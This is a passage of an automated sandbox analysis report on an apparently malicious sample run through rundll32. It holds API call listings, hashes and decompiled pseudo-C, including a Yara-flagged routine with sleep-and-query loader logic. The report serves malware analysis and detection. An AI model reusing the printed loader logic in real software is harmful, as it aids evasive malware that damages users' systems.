                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B4EA
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B4F4
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B4FE
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B508
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B512
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B51C
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B526
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B530
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B53A
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B544
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B54E
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B558
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B562
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B56C
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B576
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B580
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B58A
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B594
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B59E
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B5A8
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B5B2
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 00E7B5BC
                          • LoadIconA.USER32(00000000,0000113C), ref: 00E7BAC8
                          • StrokePath.GDI32(0000000C), ref: 00E7BAEB
                          • VirtualAlloc.KERNELBASE(00000000,-00E7FF10), ref: 00E7BBBA
                          • VirtualAlloc.KERNELBASE(00000000,-00E7FF10), ref: 00E7BBE9
                          • StrokePath.GDI32(0000000C), ref: 00E7BD1F
                          • StrokePath.GDI32(0000000C), ref: 00E7BD35
                          • StrokePath.GDI32(0000000C), ref: 00E7BD63
                          • StrokePath.GDI32(0000000C), ref: 00E7BD6F
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Load$Library$PathStroke$AllocVirtual$Icon
                          • String ID: (e$fadfadfadad$p$q$T
                          • API String ID: 140743564-3308166071
                          • Opcode ID: 903dbeb840560f03be5edde9b888078b9a264eebd0d239b5381d74c589540802
                          • Instruction ID: 6da8e8adfbd2f5fd27a81c0bdecb71d076a38102c1a62cb606728a5b17dd7b6b
                          • Opcode Fuzzy Hash: 903dbeb840560f03be5edde9b888078b9a264eebd0d239b5381d74c589540802
                          • Instruction Fuzzy Hash: 7862823028C7809FD321B7799C16A883BA07F56709716F099F978FA4A3DB9944C98773
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 146 e1557c-e155bd GetModuleFileNameA RegOpenKeyExA 147 e155ff-e15642 call e153c4 RegQueryValueExA 146->147 148 e155bf-e155db RegOpenKeyExA 146->148 153 e15644-e15660 RegQueryValueExA 147->153 154 e15666-e15680 RegCloseKey 147->154 148->147 149 e155dd-e155f9 RegOpenKeyExA 148->149 149->147 151 e15688-e156b9 lstrcpyn GetThreadLocale GetLocaleInfoA 149->151 155 e157a2-e157a9 151->155 156 e156bf-e156c3 151->156 153->154 157 e15662 153->157 158 e156c5-e156c9 156->158 159 e156cf-e156e5 lstrlen 156->159 157->154 158->155 158->159 160 e156e8-e156eb 159->160 161 e156f7-e156ff 160->161 162 e156ed-e156f5 160->162 161->155 164 e15705-e1570a 161->164 162->161 163 e156e7 162->163 163->160 165 e15734-e15736 164->165 166 e1570c-e15732 lstrcpyn LoadLibraryExA 164->166 165->155 167 e15738-e1573c 165->167 166->165 167->155 168 e1573e-e1576e lstrcpyn LoadLibraryExA 167->168 168->155 169 e15770-e157a0 lstrcpyn LoadLibraryExA 168->169 169->155
                          C-Code - Quality: 66%
                          			E00E1557C(intOrPtr __eax) {
                          				intOrPtr _v8;
                          				void* _v12;
                          				char _v15;
                          				char _v17;
                          				char _v18;
                          				char _v22;
                          				int _v28;
                          				char _v289;
                          				long _t44;
                          				long _t61;
                          				long _t63;
                          				CHAR* _t70;
                          				CHAR* _t72;
                          				struct HINSTANCE__* _t78;
                          				struct HINSTANCE__* _t84;
                          				char* _t94;
                          				void* _t95;
                          				intOrPtr _t99;
                          				struct HINSTANCE__* _t107;
                          				void* _t110;
                          				void* _t112;
                          				intOrPtr _t113;
                          
                          				_t110 = _t112;
                          				_t113 = _t112 + 0xfffffee0;
                          				_v8 = __eax;
                          				GetModuleFileNameA(0,  &_v289, 0x105);
                          				_v22 = 0;
                          				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                          				if(_t44 == 0) {
                          					L3:
                          					_push(_t110);
                          					_push(0xe15681);
                          					_push( *[fs:eax]);
                          					 *[fs:eax] = _t113;
                          					_v28 = 5;
                          					E00E153C4( &_v289, 0x105);
                          					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00E157E8, 0, 0,  &_v22,  &_v28) != 0) {
                          						_v22 = 0;
                          					}
                          					_v18 = 0;
                          					_pop(_t99);
                          					 *[fs:eax] = _t99;
                          					_push(E00E15688);
                          					return RegCloseKey(_v12);
                          				} else {
                          					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                          					if(_t61 == 0) {
                          						goto L3;
                          					} else {
                          						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
                          						if(_t63 != 0) {
                          							_push(0x105);
                          							_push(_v8);
                          							_push( &_v289);
                          							L00E112A4();
                          							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
                          							_t107 = 0;
                          							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                          								_t70 =  &_v289;
                          								_push(_t70);
                          								L00E112AC();
                          								_t94 = _t70 +  &_v289;
                          								L12:
                          								if( *_t94 != 0x2e && _t94 !=  &_v289) {
                          									_t94 = _t94 - 1;
                          									goto L12;
                          								}
                          								_t72 =  &_v289;
                          								if(_t94 != _t72) {
                          									_t95 = _t94 + 1;
                          									if(_v22 != 0) {
                          										_push(0x105 - _t95 - _t72);
                          										_push( &_v22);
                          										_push(_t95);
                          										L00E112A4();
                          										_t107 = LoadLibraryExA( &_v289, 0, 2);
                          									}
                          									if(_t107 == 0 && _v17 != 0) {
                          										_push(0x105 - _t95 -  &_v289);
                          										_push( &_v17);
                          										_push(_t95);
                          										L00E112A4();
                          										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
                          										_t107 = _t78;
                          										if(_t107 == 0) {
                          											_v15 = 0;
                          											_push(0x105 - _t95 -  &_v289);
                          											_push( &_v17);
                          											_push(_t95);
                          											L00E112A4();
                          											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
                          											_t107 = _t84;
                          										}
                          									}
                          								}
                          							}
                          							return _t107;
                          						} else {
                          							goto L3;
                          						}
                          					}
                          				}
                          			}

                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,00E7C0A4), ref: 00E15598
                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,00E7C0A4), ref: 00E155B6
                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,00E7C0A4), ref: 00E155D4
                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00E155F2
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00E15681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00E1563B
                          • RegQueryValueExA.ADVAPI32(?,00E157E8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00E15681,?,80000001), ref: 00E15659
                          • RegCloseKey.ADVAPI32(?,00E15688,00000000,?,?,00000000,00E15681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00E1567B
                          • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00E15698
                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00E156A5
                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00E156AB
                          • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00E156D6
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00E1571D
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00E1572D
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00E15755
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00E15765
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00E1578B
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 00E1579B
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                          • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                          • API String ID: 1759228003-3917250287
                          • Opcode ID: 697760e5f2cace74e049a4a856e4809f3d5c0b8a5755b7029ca773f5d6a08362
                          • Instruction ID: 994781d67519257a69430539e65b07e56337562c05cefb583946761509a24ad8
                          • Opcode Fuzzy Hash: 697760e5f2cace74e049a4a856e4809f3d5c0b8a5755b7029ca773f5d6a08362
                          • Instruction Fuzzy Hash: B3514E72A4065CBEEB21D6A49C47FEF77EC9B44744F4410A2B704F61C1E6749AC4DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 170 e15688-e156b9 lstrcpyn GetThreadLocale GetLocaleInfoA 171 e157a2-e157a9 170->171 172 e156bf-e156c3 170->172 173 e156c5-e156c9 172->173 174 e156cf-e156e5 lstrlen 172->174 173->171 173->174 175 e156e8-e156eb 174->175 176 e156f7-e156ff 175->176 177 e156ed-e156f5 175->177 176->171 179 e15705-e1570a 176->179 177->176 178 e156e7 177->178 178->175 180 e15734-e15736 179->180 181 e1570c-e15732 lstrcpyn LoadLibraryExA 179->181 180->171 182 e15738-e1573c 180->182 181->180 182->171 183 e1573e-e1576e lstrcpyn LoadLibraryExA 182->183 183->171 184 e15770-e157a0 lstrcpyn LoadLibraryExA 183->184 184->171
                          C-Code - Quality: 61%
                          			E00E15688() {
                          				void* _t28;
                          				void* _t30;
                          				struct HINSTANCE__* _t36;
                          				struct HINSTANCE__* _t42;
                          				char* _t51;
                          				void* _t52;
                          				struct HINSTANCE__* _t59;
                          				void* _t61;
                          
                          				_push(0x105);
                          				_push( *((intOrPtr*)(_t61 - 4)));
                          				_push(_t61 - 0x11d);
                          				L00E112A4();
                          				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
                          				_t59 = 0;
                          				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
                          					L14:
                          					return _t59;
                          				} else {
                          					_t28 = _t61 - 0x11d;
                          					_push(_t28);
                          					L00E112AC();
                          					_t51 = _t28 + _t61 - 0x11d;
                          					L5:
                          					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
                          						_t51 = _t51 - 1;
                          						goto L5;
                          					}
                          					_t30 = _t61 - 0x11d;
                          					if(_t51 != _t30) {
                          						_t52 = _t51 + 1;
                          						if( *((char*)(_t61 - 0x12)) != 0) {
                          							_push(0x105 - _t52 - _t30);
                          							_push(_t61 - 0x12);
                          							_push(_t52);
                          							L00E112A4();
                          							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
                          						}
                          						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
                          							_push(0x105 - _t52 - _t61 - 0x11d);
                          							_push(_t61 - 0xd);
                          							_push(_t52);
                          							L00E112A4();
                          							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                          							_t59 = _t36;
                          							if(_t59 == 0) {
                          								 *((char*)(_t61 - 0xb)) = 0;
                          								_push(0x105 - _t52 - _t61 - 0x11d);
                          								_push(_t61 - 0xd);
                          								_push(_t52);
                          								L00E112A4();
                          								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
                          								_t59 = _t42;
                          							}
                          						}
                          					}
                          					goto L14;
                          				}
                          			}

                          APIs
                          • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00E15698
                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00E156A5
                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00E156AB
                          • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00E156D6
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00E1571D
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00E1572D
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00E15755
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00E15765
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 00E1578B
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 00E1579B
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                          • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                          • API String ID: 1599918012-3917250287
                          • Opcode ID: f4459cf87ed291fb2a575206f38d6fd66bf53e6807e9aaa246dd4c316f24e6e8
                          • Instruction ID: b9214f82c7429c8b81dbb749b8096b1656d3b97e70bce6708b56e5a85567fa1a
                          • Opcode Fuzzy Hash: f4459cf87ed291fb2a575206f38d6fd66bf53e6807e9aaa246dd4c316f24e6e8
                          • Instruction Fuzzy Hash: 14318172E0066CAAEB25D6B8DC46BEE67EC8B44344F4811E2A604F61C1E6749EC4CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 185 10814ba-10814ca call 1081ddf 188 10814d0-10814d2 185->188 189 10815f4-10815f5 185->189 190 10814d3-10814da 188->190 191 10814db-10814e5 call 1081b28 190->191 194 108151c 191->194 195 10814e7-1081502 NtQuerySystemInformation 191->195 198 1081523-1081527 194->198 196 1081504 195->196 197 1081507-108151a call 1081b13 195->197 196->197 197->198 198->191 200 1081529-1081542 call 1081883 Sleep 198->200 200->190 204 1081544-1081548 200->204 205 108154e-1081551 204->205 206 10815f1-10815f3 204->206 207 10815a2-10815bc call 1081e53 205->207 208 1081553-108155e call 1081098 205->208 206->189 213 10815be-10815cc WaitForSingleObject 207->213 214 10815e2-10815e4 GetLastError 207->214 215 108159c 208->215 216 1081560-1081572 GetLongPathNameW 208->216 217 10815d9-10815e0 CloseHandle 213->217 218 10815ce-10815d3 GetExitCodeThread 213->218 219 10815e7-10815ed 214->219 215->207 220 1081594-108159a 216->220 221 1081574-1081585 call 1081b28 216->221 217->219 218->217 219->206 222 10815ef GetLastError 219->222 220->207 221->220 225 1081587-1081592 GetLongPathNameW call 1081b13 221->225 222->206 225->207
                          C-Code - Quality: 83%
                          			E010814BA(char _a4) {
                          				long _v8;
                          				long _v12;
                          				char _v36;
                          				void* __edi;
                          				long _t25;
                          				long _t27;
                          				long _t28;
                          				long _t32;
                          				intOrPtr _t40;
                          				signed int _t44;
                          				signed int _t45;
                          				long _t50;
                          				intOrPtr _t52;
                          				signed int _t53;
                          				void* _t57;
                          				void* _t60;
                          				signed int _t62;
                          				signed int _t63;
                          				void* _t67;
                          				intOrPtr* _t68;
                          
                          				_t25 = E01081DDF();
                          				_v8 = _t25;
                          				if(_t25 != 0) {
                          					return _t25;
                          				}
                          				do {
                          					_t62 = 0;
                          					_v12 = 0;
                          					_t50 = 0x30;
                          					do {
                          						_t57 = E01081B28(_t50);
                          						if(_t57 == 0) {
                          							_v8 = 8;
                          						} else {
                          							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
                          							_t53 = _t44;
                          							_t45 = _t44 & 0x0000ffff;
                          							_v8 = _t45;
                          							if(_t45 == 4) {
                          								_t50 = _t50 + 0x30;
                          							}
                          							_t63 = 0x13;
                          							_t10 = _t53 + 1; // 0x1
                          							_t62 =  *_t57 % _t63 + _t10;
                          							E01081B13(_t57);
                          						}
                          					} while (_v8 != 0);
                          					_t27 = E01081883(_t57, _t62); // executed
                          					_v8 = _t27;
                          					Sleep(_t62 << 4); // executed
                          					_t28 = _v8;
                          				} while (_t28 == 9);
                          				if(_t28 != 0) {
                          					L25:
                          					return _t28;
                          				}
                          				if(_a4 != 0) {
                          					L18:
                          					_push(0);
                          					_t67 = E01081E53(E01081C65,  &_v36);
                          					if(_t67 == 0) {
                          						_v8 = GetLastError();
                          					} else {
                          						_t32 = WaitForSingleObject(_t67, 0xffffffff);
                          						_v8 = _t32;
                          						if(_t32 == 0) {
                          							GetExitCodeThread(_t67,  &_v8);
                          						}
                          						CloseHandle(_t67);
                          					}
                          					_t28 = _v8;
                          					if(_t28 == 0xffffffff) {
                          						_t28 = GetLastError();
                          					}
                          					goto L25;
                          				}
                          				if(E01081098(_t53,  &_a4) != 0) {
                          					 *0x10841b8 = 0;
                          					goto L18;
                          				}
                          				_t52 = _a4;
                          				_t68 = __imp__GetLongPathNameW;
                          				_t60 =  *_t68(_t52, 0, 0);
                          				if(_t60 == 0) {
                          					L16:
                          					 *0x10841b8 = _t52;
                          					goto L18;
                          				}
                          				_t19 = _t60 + 2; // 0x2
                          				_t40 = E01081B28(_t60 + _t19);
                          				 *0x10841b8 = _t40;
                          				if(_t40 == 0) {
                          					goto L16;
                          				}
                          				 *_t68(_t52, _t40, _t60);
                          				E01081B13(_t52);
                          				goto L18;
                          			}

                          APIs
                            • Part of subcall function 01081DDF: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,010814C5), ref: 01081DEE
                            • Part of subcall function 01081DDF: GetVersion.KERNEL32 ref: 01081DFD
                            • Part of subcall function 01081DDF: GetCurrentProcessId.KERNEL32 ref: 01081E14
                            • Part of subcall function 01081DDF: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 01081E2D
                            • Part of subcall function 01081B28: HeapAlloc.KERNEL32(00000000,?,010814E1,00000030,751463F0,00000000), ref: 01081B34
                          • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 010814EF
                          • Sleep.KERNELBASE(00000000,00000000,00000030,751463F0,00000000), ref: 01081536
                          • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0108156C
                          • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 0108158A
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,01081C65,?,00000000), ref: 010815C1
                          • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 010815D3
                          • CloseHandle.KERNEL32(00000000), ref: 010815DA
                          • GetLastError.KERNEL32(01081C65,?,00000000), ref: 010815E2
                          • GetLastError.KERNEL32 ref: 010815EF
                          Memory Dump Source
                          • Source File: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                          • Associated: 00000003.00000002.315796531.0000000001085000.00000040.00000800.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1080000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastLongNamePathProcess$AllocCloseCodeCreateCurrentEventExitHandleHeapInformationObjectOpenQuerySingleSleepSystemThreadVersionWait
                          • String ID:
                          • API String ID: 3479304935-0
                          • Opcode ID: 606a530a4ad552242b5603b47b623f4b371201bed60437db29d1569f34a91829
                          • Instruction ID: 8ea3fa7c5eadd66cb2aba8a9d02a5ade18fb4d0dc1c2d855e859c19522841f7b
                          • Opcode Fuzzy Hash: 606a530a4ad552242b5603b47b623f4b371201bed60437db29d1569f34a91829
                          • Instruction Fuzzy Hash: 8931B171908215EFDB61FBA9D884AAE7AECEF44760F144166F5C6D7140EB34CA438BB0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
